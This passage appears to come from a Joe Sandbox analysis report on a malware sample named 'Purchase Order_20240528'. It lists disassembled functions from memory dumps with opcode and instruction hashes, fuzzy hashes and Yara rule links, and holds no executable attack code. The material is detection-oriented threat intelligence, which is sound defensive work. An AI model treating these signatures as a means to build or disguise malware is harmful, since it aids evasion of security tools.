                                  • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                  • Instruction ID: e37591dec14a14a69f7792c3d041306856ec9ce11f26511e15506079c2910cf4
                                  • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                  • Instruction Fuzzy Hash: 932179726016C1DFDB368F89C940A66BBE6FB94B10F19887DE94A8B714C730EC01CB80
                                  Function 015E80E9 Relevance: .1, Instructions: 66COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0cca6ad22ada7d94dd01c731cd0323174607679f22995a819689f5eaf931b894
                                  • Instruction ID: 3c8d1c5723ebf630001bbb78fb1a3c74760f5df832442863d5ed89cce83cb287
                                  • Opcode Fuzzy Hash: 0cca6ad22ada7d94dd01c731cd0323174607679f22995a819689f5eaf931b894
                                  • Instruction Fuzzy Hash: D7215B75A40206DFCB18CF98C591AAEBBF5FB88318F24456DD105AB311DB71ED06CB90
                                  Function 0161674D Relevance: .1, Instructions: 65COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 714fb72e3611f927bbbb5212189ad70fdea86b1492f33a5c9ed4ba41d1adb576
                                  • Instruction ID: f17bbf01ef4120badf3ea5019f616ec46e7962fcf994418c0eb2459b8d774de0
                                  • Opcode Fuzzy Hash: 714fb72e3611f927bbbb5212189ad70fdea86b1492f33a5c9ed4ba41d1adb576
                                  • Instruction Fuzzy Hash: EF218E75611A01EFD7608F69CC41B76B7F8FF84250F08882DE5AAC7260EBB0E850CB60
                                  Function 01676870 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 151f44e2ce0a34e1ebc881bd1cc44163709a8b7c19f6126e0ce4c533c40a06bc
                                  • Instruction ID: 0f319f479ee104ecc59960d3293a71882a8a6c09e75195cd7becb16364231f74
                                  • Opcode Fuzzy Hash: 151f44e2ce0a34e1ebc881bd1cc44163709a8b7c19f6126e0ce4c533c40a06bc
                                  • Instruction Fuzzy Hash: CD119132250A16EFE722DB59CD40F9A77A8EF99650F114069F205DB251DA70ED05C7A0
                                  Function 0160E8C0 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9e516d69d40a1d8bed5725934596c5ccfade2a4cf7e8a4ebc3e4e750d04cc45
                                  • Instruction ID: 8725ab4ffffe2525f301056b0cd2c9176278ac4891addbe8967fa97016065ad0
                                  • Opcode Fuzzy Hash: d9e516d69d40a1d8bed5725934596c5ccfade2a4cf7e8a4ebc3e4e750d04cc45
                                  • Instruction Fuzzy Hash: 991108737001259FCB1ADB29CC85A7B7257EFD5370B254929D9228B390EA319802C694
                                  Function 016166B0 Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f743b7441f0251b558262013d487e719652a5235176f952d206863ae340ebb00
                                  • Instruction ID: d3d347ef6335016a85381d43cb44aaf0b8c8a5873b3d13f2d737b54f4bc2e16e
                                  • Opcode Fuzzy Hash: f743b7441f0251b558262013d487e719652a5235176f952d206863ae340ebb00
                                  • Instruction Fuzzy Hash: 0411C17AA01205DFCB25CF59CD80A6ABBF4AF94610F0A407DD905DB318E7B0DD00CB90
                                  Function 016AA8E4 Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                  • Instruction ID: a33e7ce14995c8654eb0ab34134755f133309a49df13e79b0491454f92a26250
                                  • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                  • Instruction Fuzzy Hash: 29110436A10906AFDB19CB58CC01B9DBBB6FF84310F058269EC4697380E631FD01CB80
                                  Function 015E0AD0 Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                  • Instruction ID: ad96b7c25f048205483827941a21c8bf1ca17315d198026da1961bdef94974aa
                                  • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                  • Instruction Fuzzy Hash: 7821F4B5A00B059FD3A0CF29D440B56BBF4FB48B10F10492EE98ACBB40E371E814CB94
                                  Function 0166E7E1 Relevance: .1, Instructions: 59COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                  • Instruction ID: 9899771fd7b5017323cfcf603867b0513aac4fd327b8ceef1c6120d6e9b66933
                                  • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                  • Instruction Fuzzy Hash: 9C11A339610601EFE721DF49CC44B567BE9EF85754F06842CEA0A9B250D732DC41DB90
                                  Function 016027ED Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f72b1555581b28a4656bac3d3cffe3eefcc7930f77962a41da86b4ccc7e007a
                                  • Instruction ID: 9d17950c64237f7c8becd5d5d11133e3ac4fc1c80947ee58cbaf89dfe1615082
                                  • Opcode Fuzzy Hash: 8f72b1555581b28a4656bac3d3cffe3eefcc7930f77962a41da86b4ccc7e007a
                                  • Instruction Fuzzy Hash: 07012676685685ABF31BA2ADDC58F276B8DFF80394F060078FA018B380DA24DC05C271
                                  Function 015E4690 Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 532e296779ac337b6a02ca76600f0b57740fbcf7edfa9bf8ac6698493478af16
                                  • Instruction ID: 20c77e4df5c645ff27b5679b923c9d5f68803452fa2659cd0e3dcdd94b535fa8
                                  • Opcode Fuzzy Hash: 532e296779ac337b6a02ca76600f0b57740fbcf7edfa9bf8ac6698493478af16
                                  • Instruction Fuzzy Hash: 9D11E036A84745AFDB29CF59D888B5A7BE4FB85764F104519FA05CF240C770E841CFA0
                                  Function 01616620 Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd8d6dcb6da5197ddf582282ffa93c67d638a9783f48940cb0346d46b21e3050
                                  • Instruction ID: 68ee84998a1c7321868c4f89f1326c246a80a490726f07aaf036410f7cd37af5
                                  • Opcode Fuzzy Hash: cd8d6dcb6da5197ddf582282ffa93c67d638a9783f48940cb0346d46b21e3050
                                  • Instruction Fuzzy Hash: A011827AE00626ABDB21DF59CD80B5EFBB8FF88750F550859DA01AB305D770AD01CB91
                                  Function 0160EA2E Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e3a47ff8fa7ae11d21c86f81ef9c434db260aeface03237cee3e23bb250e1608
                                  • Instruction ID: a02de2a50d5981d29b96ea864a71cedf29a72ad42d3225fb483ae370dfba0e06
                                  • Opcode Fuzzy Hash: e3a47ff8fa7ae11d21c86f81ef9c434db260aeface03237cee3e23bb250e1608
                                  • Instruction Fuzzy Hash: 65019671A011069FC72ADF19DD44F16BBF9FBC5314F21456EE1058B660C7B19C81CB94
                                  Function 0160E53E Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                  • Instruction ID: c6b4fb8058b2e0467087f20929bf0ead474507f546939f4ed81617442feb8014
                                  • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                  • Instruction Fuzzy Hash: C311E1722016D2DBE723972CCD54B267B94BB41788F1908E0EE41DB7D2F72AC882C260
                                  Function 0166E75D Relevance: .1, Instructions: 54COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                  • Instruction ID: c98e1bcffb8d77aef39b5a61239d3a68b99cee13eeaa34be16f299132549710a
                                  • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                  • Instruction Fuzzy Hash: CD01803A700206AFEB25DF59CC04B6A7EADEB85B50F158428EA059B260E77ADD41C790
                                  Function 015DA250 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                  • Instruction ID: 93c5a668c8347499c723d854dc6e31964dbaac17a86359ced22a982790564602
                                  • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                  • Instruction Fuzzy Hash: 7301C072505B229BDB318F1E9840A2B7BE9FB55B607008A2DF995CF681D731D800CBA0
                                  Function 016B4940 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a29176e81da687f0c584db813885be69dfddeda3ee843158619c71d039e49125
                                  • Instruction ID: c65ef2debe8523b5bc5c04675638482f9f831b1b0be1a139cb967149daa289e4
                                  • Opcode Fuzzy Hash: a29176e81da687f0c584db813885be69dfddeda3ee843158619c71d039e49125
                                  • Instruction Fuzzy Hash: 940126724412129FC332EF1CCC80E96B7A8EF81370B154219EA6A9B293DB30D841C7C0
                                  Function 0165E1D0 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1af763c1fd02c9d383019f7cc08351599c4b6c6916b1d61376d7ad852b1569c3
                                  • Instruction ID: 1dc69773fbed01a1199e2dd981cec034026b6cee5e4c64e02c18a3c40cc5956f
                                  • Opcode Fuzzy Hash: 1af763c1fd02c9d383019f7cc08351599c4b6c6916b1d61376d7ad852b1569c3
                                  • Instruction Fuzzy Hash: 22118E31641641EFDB15AF19CD90F16BBB9FF94B84F100069E9059B651C635ED01CA90
                                  Function 015E6259 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 74b579ba8a0bc2f29c17a8894870d9a5fe89213701dbdd044ce95f786219875f
                                  • Instruction ID: c54ef4823bace91e88a7a75ca30eb51d91fd806f6f8baf0c3767fbe8998e1dc0
                                  • Opcode Fuzzy Hash: 74b579ba8a0bc2f29c17a8894870d9a5fe89213701dbdd044ce95f786219875f
                                  • Instruction Fuzzy Hash: B8117071941629ABDB25EB64CC61FED73B5BF18714F5041D8E314AA1E0D7709E81CF88
                                  Function 01666050 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 08ab63c5fdc7855f5fb1db95ea7a550a3cbd7aeb7a976312c992cb67e82cbb80
                                  • Instruction ID: bf757d2feb8071b87e72fa89c40cd28aba461c87bb5d1b99a3f979c28d30a4af
                                  • Opcode Fuzzy Hash: 08ab63c5fdc7855f5fb1db95ea7a550a3cbd7aeb7a976312c992cb67e82cbb80
                                  • Instruction Fuzzy Hash: 59112973D00019ABCB11DB94DC80DDFBBBDEF48254F044166E906E7211EA34EA15CBE0
                                  Function 015E208A Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                  • Instruction ID: 34321acb7346b7f47820b9876fb5786f9698cf58da2adf83aaa9c2f8314050b4
                                  • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                  • Instruction Fuzzy Hash: C401F572A011018BEF198A5DDC84A967BEBBFC4700F1545A9ED058F28ADA71CC81C390
                                  Function 01676500 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 02a02a260a22cfb9c91aaaa9b7b9ba74685c531c640fb3f65c8ab000d442b06a
                                  • Instruction ID: 6636a4860a7f3a5858b7bf18934cfc47c2c6b4527e8f236f9f5f41e433871c63
                                  • Opcode Fuzzy Hash: 02a02a260a22cfb9c91aaaa9b7b9ba74685c531c640fb3f65c8ab000d442b06a
                                  • Instruction Fuzzy Hash: B611A1326445469FE711CF68D800BA6BBB9FB9A314F088159E949CB315D732EC81DBA0
                                  Function 0166C810 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 51f105001ada2449522a575054818fcd3cbd21e1a5783b4b1302d30e0e2b985e
                                  • Instruction ID: 6a7ad8a7d06a92af4ddc1e82d73d8d4c1661039760832723eda70239f4371cd5
                                  • Opcode Fuzzy Hash: 51f105001ada2449522a575054818fcd3cbd21e1a5783b4b1302d30e0e2b985e
                                  • Instruction Fuzzy Hash: D51118B1E006199BCB00DFA9D941AAEBBF8FF58350F10406AE905E7351D674EA01CBA4
                                  Function 0168EA60 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e748a465ddc087866885872d6006a1a776b3838a189e15c39efd1d852aa84870
                                  • Instruction ID: 3ea01713e749a9dd8355b066b45293abf073b62de01c22de7601cd320269db8a
                                  • Opcode Fuzzy Hash: e748a465ddc087866885872d6006a1a776b3838a189e15c39efd1d852aa84870
                                  • Instruction Fuzzy Hash: 9901B1715402129BCB32BF19CC44D36FBA9FF92A50B05452EEA555F311CB22DC42CB91
                                  Function 015DC020 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                  • Instruction ID: 6c6978770460e79238ec40d255229b0af5b24ce8680e8fc8d28ced9d0885123b
                                  • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
